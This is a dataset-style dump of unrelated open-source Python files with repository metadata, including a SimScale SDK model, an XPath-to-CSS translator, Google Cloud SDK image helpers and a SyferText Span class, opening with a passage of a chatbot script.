with open(nam+".txt", "r") as myfile:
daa = myfile.read()
with open(nam+".template", "a") as myf:
now = str(datetime.now())
myf.write("\n{ mood "+now+": "+sas(daa)+" }")
myf.write("\n{ reason "+now+": "+daa+" }")
os.remove(nam+".txt")
if path.exists("learn.txt"):
with open("learn.txt", "r") as myfile:
daa = myfile.read()
with open(nam+".template", "a") as myf:
myf.write(daa)
os.remove("learn.txt")
encryp(template)
chat()
| 31.46875
| 139
| 0.532274
|
9224fec6cc3a8536d7ccff2981c130e0c793fadb
| 4,572
|
py
|
Python
|
simscale_sdk/models/dimensional_partial_vector_function_angle.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | 8
|
2021-01-22T13:41:03.000Z
|
2022-01-03T09:00:10.000Z
|
simscale_sdk/models/dimensional_partial_vector_function_angle.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | null | null | null |
simscale_sdk/models/dimensional_partial_vector_function_angle.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | 3
|
2021-03-18T15:52:52.000Z
|
2022-01-03T08:59:30.000Z
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class DimensionalPartialVectorFunctionAngle(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'value': 'PartialVectorFunction',
'unit': 'str'
}
attribute_map = {
'value': 'value',
'unit': 'unit'
}
def __init__(self, value=None, unit=None, local_vars_configuration=None): # noqa: E501
"""DimensionalPartialVectorFunctionAngle - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._value = None
self._unit = None
self.discriminator = None
if value is not None:
self.value = value
self.unit = unit
@property
def value(self):
"""Gets the value of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:return: The value of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:rtype: PartialVectorFunction
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this DimensionalPartialVectorFunctionAngle.
:param value: The value of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:type: PartialVectorFunction
"""
self._value = value
@property
def unit(self):
"""Gets the unit of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:return: The unit of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:rtype: str
"""
return self._unit
@unit.setter
def unit(self, unit):
"""Sets the unit of this DimensionalPartialVectorFunctionAngle.
:param unit: The unit of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and unit is None: # noqa: E501
raise ValueError("Invalid value for `unit`, must not be `None`") # noqa: E501
allowed_values = ["rad", "°"] # noqa: E501
if self.local_vars_configuration.client_side_validation and unit not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `unit` ({0}), must be one of {1}" # noqa: E501
.format(unit, allowed_values)
)
self._unit = unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DimensionalPartialVectorFunctionAngle):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, DimensionalPartialVectorFunctionAngle):
return True
return self.to_dict() != other.to_dict()
| 30.078947
| 109
| 0.595582
|
5ebbc51a5a6a914afcb30882d51e18fcc83fdefc
| 9,887
|
py
|
Python
|
sel4/core/helpers__/translator.py
|
daniv/sel4
|
0a4f8f0c86c672d9eb2582669ee1c70f41043316
|
[
"MIT"
] | null | null | null |
sel4/core/helpers__/translator.py
|
daniv/sel4
|
0a4f8f0c86c672d9eb2582669ee1c70f41043316
|
[
"MIT"
] | null | null | null |
sel4/core/helpers__/translator.py
|
daniv/sel4
|
0a4f8f0c86c672d9eb2582669ee1c70f41043316
|
[
"MIT"
] | null | null | null |
import re
from cssselect import GenericTranslator
from loguru import logger
from sel4.utils.functional import lazy, keep_lazy
from sel4.utils.regex_helper import _lazy_re_compile
class XpathException(Exception):
pass
_sub_regexes = {
"tag": r"([a-zA-Z][a-zA-Z0-9]{0,10}|\*)",
"attribute": r"[.a-zA-Z_:][-\w:.]*(\(\))?)",
"value": r"\s*[\w/:][-/\w\s,:;.\S]*",
}
_validation_re = (
r"(?P<node>"
r"("
r"^id\([\"\']?(?P<idvalue>%(value)s)[\"\']?\)"
r"|"
r"(?P<nav>//?)(?P<tag>%(tag)s)"
r"(\[("
r"(?P<matched>(?P<mattr>@?%(attribute)s=[\"\']"
r"(?P<mvalue>%(value)s))[\"\']"
r"|"
r"(?P<contained>contains\((?P<cattr>@?%(attribute)s,\s*[\"\']"
r"(?P<cvalue>%(value)s)[\"\']\))"
r")\])?"
r"(\[(?P<nth>\d+)\])?"
r")"
r")" % _sub_regexes
)
prog = _lazy_re_compile(_validation_re)
class CssTranslator(GenericTranslator):
def css_to_xpath(self, css, prefix="//"):
return super(CssTranslator, self).css_to_xpath(css, prefix)
def xpath_attrib_equals(self, xpath, name, value):
xpath.add_condition("%s=%s" % (name, self.xpath_literal(value)))
return xpath
def xpath_attrib_includes(self, xpath, name, value):
from cssselect.xpath import is_non_whitespace
if is_non_whitespace(value):
xpath.add_condition(
"contains(%s, %s)" % (name, self.xpath_literal(value))
)
else:
xpath.add_condition("0")
return xpath
def xpath_attrib_substringmatch(self, xpath, name, value):
if value:
# Attribute selectors are case sensitive
xpath.add_condition(
"contains(%s, %s)" % (name, self.xpath_literal(value))
)
else:
xpath.add_condition("0")
return xpath
def xpath_class(self, class_selector):
xpath = self.xpath(class_selector.selector)
return self.xpath_attrib_includes(
xpath, "@class", class_selector.class_name
)
def xpath_descendant_combinator(self, left, right):
"""right is a child, grand-child or further descendant of left"""
return left.join("//", right)
@keep_lazy
def convert_xpath_to_css(xpath) -> str:
xpath = xpath.replace(" = '", "='")
# region Start handling special xpath ms-edge cases
logger.trace("Start handling special xpath ms-edge cases")
c3 = "@class and contains(concat(' ', normalize-space(@class), ' '), ' "
if c3 in xpath and xpath.count(c3) == 1 and xpath.count("[@") == 1:
p2 = " ') and (contains(., '"
if (
xpath.count(p2) == 1
and xpath.endswith("'))]")
and xpath.count("//") == 1
and xpath.count(" ') and (") == 1
):
s_contains = xpath.split(p2)[1].split("'))]")[0]
s_tag = xpath.split("//")[1].split("[@class")[0]
s_class = xpath.split(c3)[1].split(" ') and (")[0]
return '%s.%s:contains("%s")' % (s_tag, s_class, s_contains)
# Find instance of: //tag[@attribute='value' and (contains(., 'TEXT'))]
data = re.match(
r"""^\s*//(\S+)\[@(\S+)='(\S+)'\s+and\s+"""
r"""\(contains\(\.,\s'(\S+)'\)\)\]""",
xpath,
)
if data:
s_tag = data.group(1)
s_atr = data.group(2)
s_val = data.group(3)
s_contains = data.group(4)
return '%s[%s="%s"]:contains("%s")' % (s_tag, s_atr, s_val, s_contains)
# Find instance of: //tag[@attribute1='value1' and (@attribute2='value2')]
data = re.match(
r"""^\s*//(\S+)\[@(\S+)='(\S+)'\s+and\s+"""
r"""\(@(\S+)='(\S+)'\)\]""",
xpath,
)
if data:
s_tag = data.group(1)
s_atr1 = data.group(2)
s_val1 = data.group(3)
s_atr2 = data.group(4)
s_val2 = data.group(5)
return '%s[%s="%s"][%s="%s"]' % (s_tag, s_atr1, s_val1, s_atr2, s_val2)
logger.trace("End of handling special xpath ms-edge cases")
# endregion Start handling special xpath ms-edge case
if xpath[0] != '"' and xpath[-1] != '"' and xpath.count('"') % 2 == 0:
logger.trace("Handling brackets in strings")
xpath = _handle_brackets_in_strings(xpath)
xpath = xpath.replace("descendant-or-self::*/", "descORself/")
if len(xpath) > 3:
xpath = xpath[0:3] + xpath[3:].replace("//", "/descORself/")
if " and contains(@" in xpath and xpath.count(" and contains(@") == 1:
spot1 = xpath.find(" and contains(@")
spot1 = spot1 + len(" and contains(@")
spot2 = xpath.find(",", spot1)
attr = xpath[spot1:spot2]
swap = " and contains(@%s, " % attr
if swap in xpath:
swap_spot = xpath.find(swap)
close_paren = xpath.find("]", swap_spot) - 1
close_paren_p1 = close_paren + 1 # Make "flake8" and "black" agree
if close_paren > 1:
xpath = xpath[:close_paren] + xpath[close_paren_p1:]
xpath = xpath.replace(swap, "_STAR_=")
if xpath.startswith("("):
logger.trace("Filtering xpath grouping")
xpath = _filter_xpath_grouping(xpath)
logger.trace("Get raw css from xpath")
css = _get_raw_css_from_xpath(xpath)
attribute_defs = re.findall(r"(\[\w+\=\S+\])", css)
for attr_def in attribute_defs:
if (
attr_def.count("[") == 1
and attr_def.count("]") == 1
and attr_def.count("=") == 1
and attr_def.count('"') == 0
and attr_def.count("'") == 0
and attr_def.count(" ") == 0
):
# Now safe to manipulate
q1 = attr_def.find("=") + 1
q2 = attr_def.find("]")
new_attr_def = attr_def[:q1] + "'" + attr_def[q1:q2] + "']"
css = css.replace(attr_def, new_attr_def)
logger.trace("Replace the string-brackets with escaped ones")
css = css.replace("_STR_L_bracket_", "\\[")
css = css.replace("_STR_R_bracket_", "\\]")
logger.trace("Handle a lot of edge cases with conversion")
css = css.replace(" > descORself > ", " ")
css = css.replace(" descORself > ", " ")
css = css.replace("/descORself/*", " ")
css = css.replace("/descORself/", " ")
css = css.replace("descORself > ", "")
css = css.replace("descORself/", " ")
css = css.replace("descORself", " ")
css = css.replace("_STAR_=", "*=")
css = css.replace("]/", "] ")
css = css.replace("] *[", "] > [")
css = css.replace("'", '"')
css = css.replace("[@", "[")
return css
@keep_lazy
def _get_raw_css_from_xpath(xpath: str) -> str:
css = ""
attr = ""
position = 0
while position < len(xpath):
node = prog.match(xpath[position:])
if node is None:
raise XpathException("Invalid or unsupported Xpath: %s" % xpath)
match = node.groupdict()
if position != 0:
nav = " " if match["nav"] == "//" else " > "
else:
nav = ""
tag = "" if match["tag"] == "*" else match["tag"] or ""
if match["idvalue"]:
attr = "#%s" % match["idvalue"].replace(" ", "#")
elif match["matched"]:
if match["mattr"] == "@id":
attr = "#%s" % match["mvalue"].replace(" ", "#")
elif match["mattr"] == "@class":
attr = ".%s" % match["mvalue"].replace(" ", ".")
elif match["mattr"] in ["text()", "."]:
attr = ":contains(^%s$)" % match["mvalue"]
elif match["mattr"]:
attr = '[%s="%s"]' % (
match["mattr"].replace("@", ""),
match["mvalue"],
)
elif match["contained"]:
if match["cattr"].startswith("@"):
attr = '[%s*="%s"]' % (
match["cattr"].replace("@", ""),
match["cvalue"],
)
elif match["cattr"] == "text()":
attr = ':contains("%s")' % match["cvalue"]
elif match["cattr"] == ".":
attr = ':contains("%s")' % match["cvalue"]
else:
attr = ""
if match["nth"]:
nth = ":nth-of-type(%s)" % match["nth"]
else:
nth = ""
node_css = nav + tag + attr + nth
css += node_css
position += node.end()
else:
css = css.strip()
return css
@keep_lazy
def _filter_xpath_grouping(xpath: str) -> str:
"""
This method removes the outer parentheses for xpath grouping.
The xpath converter will break otherwise.
Example:
"(//button[@type='submit'])[1]" becomes "//button[@type='submit'][1]"
"""
# First remove the first open parentheses
xpath = xpath[1:]
# Next remove the last closed parentheses
index = xpath.rfind(")")
index_p1 = index + 1 # Make "flake8" and "black" agree
if index == -1:
raise XpathException("Invalid or unsupported Xpath: %s" % xpath)
xpath = xpath[:index] + xpath[index_p1:]
return xpath
@keep_lazy
def _handle_brackets_in_strings(xpath: str) -> str:
# Edge Case: Brackets in strings.
# Example from GitHub.com -
# '<input type="text" id="user[login]">' => '//*[@id="user[login]"]'
# Need to tell apart string-brackets from regular brackets
new_xpath = ""
chunks = xpath.split('"')
len_chunks = len(chunks)
for chunk_num in range(len_chunks):
if chunk_num % 2 != 0:
chunks[chunk_num] = chunks[chunk_num].replace(
"[", "_STR_L_bracket_"
)
chunks[chunk_num] = chunks[chunk_num].replace(
"]", "_STR_R_bracket_"
)
new_xpath += chunks[chunk_num]
if chunk_num != len_chunks - 1:
new_xpath += '"'
return new_xpath
| 33.177852
| 79
| 0.518762
|
771b2a4d230f41ff304860cd50cc35b479fc4819
| 13,611
|
py
|
Python
|
lib/googlecloudsdk/api_lib/compute/image_utils.py
|
bshaffer/google-cloud-sdk
|
f587382fd112f238c0d6d5ca3dab8f52d2b5c5f9
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/api_lib/compute/image_utils.py
|
bshaffer/google-cloud-sdk
|
f587382fd112f238c0d6d5ca3dab8f52d2b5c5f9
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/api_lib/compute/image_utils.py
|
bshaffer/google-cloud-sdk
|
f587382fd112f238c0d6d5ca3dab8f52d2b5c5f9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*- #
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common classes and functions for images."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import constants
from googlecloudsdk.api_lib.compute import request_helper
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
FAMILY_PREFIX = 'family/'
GUEST_OS_FEATURES = ['MULTI_IP_SUBNET',
'SECURE_BOOT',
'UEFI_COMPATIBLE',
'VIRTIO_SCSI_MULTIQUEUE',
'WINDOWS',
]
GUEST_OS_FEATURES_BETA = ['MULTI_IP_SUBNET',
'SECURE_BOOT',
'UEFI_COMPATIBLE',
'VIRTIO_SCSI_MULTIQUEUE',
'WINDOWS',
]
GUEST_OS_FEATURES_ALPHA = ['MULTI_IP_SUBNET',
'SECURE_BOOT',
'UEFI_COMPATIBLE',
'VIRTIO_SCSI_MULTIQUEUE',
'WINDOWS',
'GVNIC'
]
class ImageExpander(object):
"""Class for expanding image aliases."""
def __init__(self, compute_client, resources):
"""Instantiate ImageExpander and embed all required data into it.
ImageExpander is a class depending on "base_classes"
class layout (properties side-derived from one of base_class class). This
function can be used to avoid unfeasible inheritance and use composition
instead when refactoring away from base_classes into stateless style.
This constructor embeds following properties into ImageExpander instance:
- compute
- messages
- http
- batch_url
- resources
Example:
compute_holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = compute_holder.client
resources = compute_holder.resources
image_expander = ImageExpander(client, resources)
or
image_expander = ImageExpander(self.compute_client, self.resources)
to use in a class derived from some of base_classes
image_expander.ExpandImageFlag(...)
Args:
compute_client: compute_holder.client
resources: compute_holder.resources
"""
self._compute = compute_client.apitools_client
self._messages = compute_client.messages
self._http = compute_client.apitools_client.http
self._batch_url = compute_client.batch_url
self._resources = resources
def GetMatchingImages(self, user_project, image, alias, errors):
"""Yields images from a public image project and the user's project."""
service = self._compute.images
requests = [
(service,
'List',
self._messages.ComputeImagesListRequest(
filter='name eq ^{0}(-.+)*-v.+'.format(alias.name_prefix),
maxResults=constants.MAX_RESULTS_PER_PAGE,
project=alias.project)),
(service,
'List',
self._messages.ComputeImagesListRequest(
filter='name eq ^{0}$'.format(image),
maxResults=constants.MAX_RESULTS_PER_PAGE,
project=user_project)),
]
return request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors)
def GetImage(self, image_ref):
"""Returns the image resource corresponding to the given reference."""
errors = []
requests = []
name = image_ref.Name()
if name.startswith(FAMILY_PREFIX):
requests.append((self._compute.images,
'GetFromFamily',
self._messages.ComputeImagesGetFromFamilyRequest(
family=name[len(FAMILY_PREFIX):],
project=image_ref.project)))
else:
requests.append((self._compute.images,
'Get',
self._messages.ComputeImagesGetRequest(
image=name,
project=image_ref.project)))
res = list(request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors))
if errors:
utils.RaiseException(
errors,
utils.ImageNotFoundError,
error_message='Could not fetch image resource:')
return res[0]
def ExpandImageFlag(self,
user_project,
image=None,
image_family=None,
image_project=None,
return_image_resource=False):
"""Resolves the image or image-family value.
If the value of image is one of the aliases defined in the
constants module, both the user's project and the public image
project for the alias are queried. Otherwise, only the user's
project is queried. If image is an alias and image-project is
provided, only the given project is queried.
Args:
user_project: The user's project.
image: The name of the image.
image_family: The family of the image. Is ignored if image name is
specified.
image_project: The project of the image.
return_image_resource: If True, always makes an API call to also
fetch the image resource.
Returns:
A tuple where the first element is the self link of the image. If
return_image_resource is False, the second element is None, otherwise
it is the image resource.
"""
# If an image project was specified, then assume that image refers
# to an image in that project.
if image_project:
image_project_ref = self._resources.Parse(
image_project, collection='compute.projects')
image_project = image_project_ref.Name()
image_ref = None
if image:
image_ref = self._resources.Parse(
image,
params={
'project': image_project
or properties.VALUES.core.project.GetOrFail,
},
collection='compute.images')
else:
if image_family is not None:
image_ref = self._resources.Parse(
image_family,
params={
'project': image_project
or properties.VALUES.core.project.GetOrFail
},
collection='compute.images')
else:
image_ref = self._resources.Parse(
constants.DEFAULT_IMAGE_FAMILY,
collection='compute.images',
params={'project': 'debian-cloud'})
if not image_ref.image.startswith(FAMILY_PREFIX):
relative_name = image_ref.RelativeName()
relative_name = (relative_name[:-len(image_ref.image)] +
FAMILY_PREFIX + image_ref.image)
image_ref = self._resources.ParseRelativeName(
relative_name, image_ref.Collection())
if image_project:
return (image_ref.SelfLink(),
self.GetImage(image_ref) if return_image_resource else None)
alias = constants.IMAGE_ALIASES.get(image_ref.Name())
# Check for hidden aliases.
if not alias:
alias = constants.HIDDEN_IMAGE_ALIASES.get(image_ref.Name())
# If the image name given is not an alias and no image project was
# provided, then assume that the image value refers to an image in
# the user's project.
if not alias:
return (image_ref.SelfLink(),
self.GetImage(image_ref) if return_image_resource else None)
# At this point, the image is an alias and now we have to find the
# latest one among the public image project and the user's
# project.
WarnAlias(alias)
errors = []
images = self.GetMatchingImages(user_project, image_ref.Name(), alias,
errors)
user_image = None
public_images = []
for image in images:
if image.deprecated:
continue
image_ref2 = self._resources.Parse(
image.selfLink, collection='compute.images', enforce_collection=True)
if image_ref2.project == user_project:
user_image = image
else:
public_images.append(image)
if errors or not public_images:
# This should happen only if there is something wrong with the
# image project (e.g., operator error) or the global control
# plane is down.
utils.RaiseToolException(
errors,
'Failed to find image for alias [{0}] in public image project [{1}].'
.format(image_ref.Name(), alias.project))
def GetVersion(image):
"""Extracts the "20140718" from an image name like "debian-v20140718"."""
parts = image.name.rsplit('v', 1)
if len(parts) != 2:
log.debug('Skipping image with malformed name [%s].', image.name)
return ''
return parts[1]
public_candidate = max(public_images, key=GetVersion)
if user_image:
options = [user_image, public_candidate]
idx = console_io.PromptChoice(
options=[image.selfLink for image in options],
default=0,
message=('Found two possible choices for [--image] value [{0}].'
.format(image_ref.Name())))
res = options[idx]
else:
res = public_candidate
log.debug('Image resolved to [%s].', res.selfLink)
return (res.selfLink, res if return_image_resource else None)
def HasWindowsLicense(resource, resource_parser):
"""Returns True if the given image or disk has a Windows license."""
for license_uri in resource.licenses:
license_ref = resource_parser.Parse(
license_uri, collection='compute.licenses')
if license_ref.project in constants.WINDOWS_IMAGE_PROJECTS:
return True
return False
def AddImageProjectFlag(parser):
"""Adds the --image flag to the given parser."""
parser.add_argument(
'--image-project',
help="""\
The project against which all image and image family references will be
resolved. It is best practice to define image-project.
* If specifying one of our public images, image-project must be
provided.
* If there are several of the same image-family value in multiple
projects, image-project must be specified to clarify the image to
be used.
* If not specified and either image or image-family is provided, the
current default project is used.
""")
def WarnAlias(alias):
"""WarnAlias outputs a warning telling users to not use the given alias."""
msg = ('Image aliases are deprecated and will be removed in a future '
'version. ')
if alias.family is not None:
msg += ('Please use --image-family={family} and --image-project={project} '
'instead.').format(family=alias.family, project=alias.project)
else:
msg += 'Please use --image-family and --image-project instead.'
log.warning(msg)
def AddGuestOsFeaturesArg(parser, release_track):
"""Add the guest-os-features arg."""
# Alpha and Beta Args
guest_os_features = []
if release_track == base.ReleaseTrack.GA:
guest_os_features = GUEST_OS_FEATURES
elif release_track == base.ReleaseTrack.BETA:
guest_os_features = GUEST_OS_FEATURES_BETA
elif release_track == base.ReleaseTrack.ALPHA:
guest_os_features = GUEST_OS_FEATURES_ALPHA
if not guest_os_features:
return
parser.add_argument(
'--guest-os-features',
metavar='GUEST_OS_FEATURE',
type=arg_parsers.ArgList(
element_type=lambda x: x.upper(), choices=guest_os_features),
help="""\
This parameter enables one or more features for VM instances that use the
image for their boot disks. The following features are available:
* MULTI_IP_SUBNET - For configuring interfaces with a netmask other than
/32.
* SECURE_BOOT - Enables UEFI secure boot, which restrics unsigned
software from booting or unsigned drivers from loading on the VM
instance.
* UEFI_COMPATIBLE - Enables UEFI booting, which is an alternative system
boot method. Most public images use the GRUB bootloader as their
primary boot method.
* VIRTIO_SCSI_MULTIQUEUE - Enables multiqueue SCSI capabilities for
Local SSD devices. This option is an alternative to NVMe.
* For Linux images, you can enable VIRTIO_SCSI_MULTIQUEUE on images
with kernel versions 3.17 and higher.
* For Windows images, you can enable VIRTIO_SCSI_MULTIQUEUE on images
with driver version 1.2.0.1621 or higher.
* WINDOWS - Required for Windows Server images. Newer public images for
Windows server include the WINDOWS parameter to indicate that it is a
Windows image.
""")
| 36.490617
| 79
| 0.647197
|
208cb684e4122d9c479e1636fdb903d4f52a0821
| 9,823
|
py
|
Python
|
syfertext/span.py
|
shashank-m/SyferText
|
9e9a5206a6a65cfe1facc1d64b92451b94267ae1
|
[
"Apache-2.0"
] | null | null | null |
syfertext/span.py
|
shashank-m/SyferText
|
9e9a5206a6a65cfe1facc1d64b92451b94267ae1
|
[
"Apache-2.0"
] | null | null | null |
syfertext/span.py
|
shashank-m/SyferText
|
9e9a5206a6a65cfe1facc1d64b92451b94267ae1
|
[
"Apache-2.0"
] | null | null | null |
import syft
import torch
hook = syft.TorchHook(torch)
from syft.generic.object import AbstractObject
from syft.workers.base import BaseWorker
from syfertext.token import Token
from typing import List
from typing import Dict
from typing import Set
from typing import Union
from .underscore import Underscore
from .utils import normalize_slice
class Span(AbstractObject):
"""A slice from a Doc object.
"""
def __init__(
self, doc: "Doc", start: int, end: int, id: int = None, owner: BaseWorker = None,
):
"""Create a `Span` object from the slice `doc[start : end]`.
Args:
doc (Doc): The parent document.
start (int): The index of the first token of the span.
end (int): The index of the first token after the span.
Returns (Span):
The newly constructed object.
"""
super(Span, self).__init__(id=id, owner=owner)
self.doc = doc
self.start = start
# We don't need to handle `None` here
# it will be handled by normalize slice
# Invalid ranges handled by normalize function
self.end = end
# This is used to keep track of the client worker that this span
# caters to.
# Usually, it would be the worker operating the pipeline.
# we set this equal to `doc.client_id` as span's client will be same as doc's client
self.client_id = doc.client_id
# The owner of the span object will be same worker where doc resides
self.owner = doc.owner
# Initialize the Underscore object (inspired by spaCy)
# This object will hold all the custom attributes set
# using the `self.set_attribute` method
self._ = Underscore()
def set_attribute(self, name: str, value: object):
"""Creates a custom attribute with the name `name` and
value `value` in the Underscore object `self._`
Args:
name (str): name of the custom attribute.
value (object): value of the custom named attribute.
"""
# make sure there is no space in name as well prevent empty name
assert (
isinstance(name, str) and len(name) > 0 and (not (" " in name))
), "Argument `name` should be a non-empty `str` type containing no spaces"
setattr(self._, name, value)
def __getitem__(self, key: Union[int, slice]):
"""Returns a Token object at position `key` or returns Span using slice `key` or the
id of the Token object or id of the Span object at remote location.
Args:
key (int or slice): The index of the token within the span, or slice of
the span to get.
Returns:
Token or Span or id of the Token or id of the Span
"""
if isinstance(key, int):
if key < 0:
token_meta = self.doc.container[self.end + key]
else:
token_meta = self.doc.container[self.start + key]
# Create a Token object with owner same as the span object
token = Token(doc=self.doc, token_meta=token_meta, position=key, owner=self.owner)
return token
if isinstance(key, slice):
# normalize to handle negative slicing
start, end = normalize_slice(len(self), key.start, key.stop, key.step)
# shift the origin
start += self.start
end += self.start
# Assign the new span to the same owner as this object
owner = self.owner
# Create a new span object
span = Span(self.doc, start, end, owner=owner)
# If the following condition is satisfied, this means that this
# Span is on a different worker (the Span's owner) than the one where
# the Language object that operates the pipeline is located (the Span's client).
# In this case we will create the new Span at the same worker as
# this Span, and return its ID to the client worker where a SpanPointer
# will be made out of this id.
if span.owner.id != span.client_id:
# Register the Span on it's owners object store
self.owner.register_obj(obj=span)
# Return span_id using which we can create the SpanPointer
return span.id
return span
def __len__(self):
"""Return the number of tokens in the Span."""
return self.end - self.start
def __iter__(self):
"""Allows to loop over tokens in `Span.doc`"""
for i in range(len(self)):
# Yield a Token object
yield self[i]
@property
def vector(self):
"""Get span vector as an average of in-vocabulary token's vectors
Returns:
span_vector: span vector
"""
# Accumulate the vectors here
vectors = None
# Count the tokens that have vectors
vector_count = 0
for token in self:
# Get the vector of the token if one exists
if token.has_vector:
# Increment the vector counter
vector_count += 1
# Cumulate token's vector by summing them
vectors = token.vector if vectors is None else vectors + token.vector
# If no tokens with vectors were found, just get the default vector(zeros)
if vector_count == 0:
span_vector = self.doc.vocab.vectors.default_vector
else:
# Create the final span vector
span_vector = vectors / vector_count
return span_vector
def get_vector(self, excluded_tokens: Dict[str, Set[object]] = None):
"""Get Span vector as an average of in-vocabulary token's vectors,
excluding token according to the excluded_tokens dictionary.
Args:
excluded_tokens (Dict): A dictionary used to ignore tokens of the document based on values
of their attributes, the keys are the attributes names and they index, for efficiency, sets of values.
Example: {'attribute1_name' : {value1, value2}, 'attribute2_name': {v1, v2}, ....}
Returns:
span_vector: Span vector ignoring excluded tokens
"""
# If the excluded_token dict in None then all token are included
if excluded_tokens is None:
return self.vector
# Enforcing that the values of the excluded_tokens dict are sets, not lists.
excluded_tokens = {
attribute: set(excluded_tokens[attribute]) for attribute in excluded_tokens
}
vectors = None
# Count the tokens that have vectors
vector_count = 0
for token in self:
# Get the vector of the token if one exists and if token is not excluded
include_token = True
include_token = all(
[
getattr(token._, key) not in excluded_tokens[key]
for key in excluded_tokens.keys()
if hasattr(token._, key)
]
)
if token.has_vector and include_token:
# Increment the vector counter
vector_count += 1
# Cumulate token's vector by summing them
vectors = token.vector if vectors is None else vectors + token.vector
# If no tokens with vectors were found, just get the default vector(zeros)
if vector_count == 0:
span_vector = self.doc.vocab.vectors.default_vector
else:
# Create the final span vector
span_vector = vectors / vector_count
return span_vector
def as_doc(self):
"""Create a `Doc` object with a copy of the `Span`'s tokens.
Returns :
The new `Doc` copy (or id to `Doc` object) of the span.
"""
# Handle circular imports
from .doc import Doc
# Create a new doc object on the required location
# Assign the same owner on which this object resides
# Client of the doc created will be same as the span's client
doc = Doc(self.doc.vocab, owner=self.owner, client_id=self.client_id)
# Iterate over the token_meta present in span
for idx in range(self.start, self.end):
# Add token meta object to the new doc
doc.container.append(self.doc.container[idx])
# Same reason as explained in __getitem__ above
if doc.owner.id != doc.client_id:
# Register the Doc on its owner's object store
doc.owner.register_obj(obj=doc)
# Return doc_id which can be used to create DocPointer
return doc.id
return doc
@staticmethod
def create_pointer(
span,
location: BaseWorker = None,
id_at_location: (str or int) = None,
register: bool = False,
owner: BaseWorker = None,
ptr_id: (str or int) = None,
garbage_collect_data: bool = True,
):
"""Creates a SpanPointer object that points to a Span object living in the the worker 'location'.
Returns:
SpanPointer: pointer object to a Span
"""
# I put the import here in order to avoid circular imports
from .pointers.span_pointer import SpanPointer
if id_at_location is None:
id_at_location = span.id
if owner is None:
owner = span.owner
span_pointer = SpanPointer(
location=location,
id_at_location=id_at_location,
owner=owner,
id=ptr_id,
garbage_collect_data=garbage_collect_data,
)
return span_pointer
| 32.634551
| 118
| 0.597475
|
df4b64898f9d884f32ee8a4301fdb50bd1ad33d0
| 2,891
|
py
|
Python
|
solvcon/parcel/gas/case.py
|
j8xixo12/solvcon
|
a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a
|
[
"BSD-3-Clause"
] | 16
|
2015-12-09T02:54:42.000Z
|
2021-04-20T11:26:39.000Z
|
solvcon/parcel/gas/case.py
|
j8xixo12/solvcon
|
a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a
|
[
"BSD-3-Clause"
] | 95
|
2015-12-09T00:49:40.000Z
|
2022-02-14T13:34:55.000Z
|
solvcon/parcel/gas/case.py
|
j8xixo12/solvcon
|
a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a
|
[
"BSD-3-Clause"
] | 13
|
2015-05-08T04:16:42.000Z
|
2021-01-15T09:28:06.000Z
|
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2014, Yung-Yu Chen <yyc@solvcon.net>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
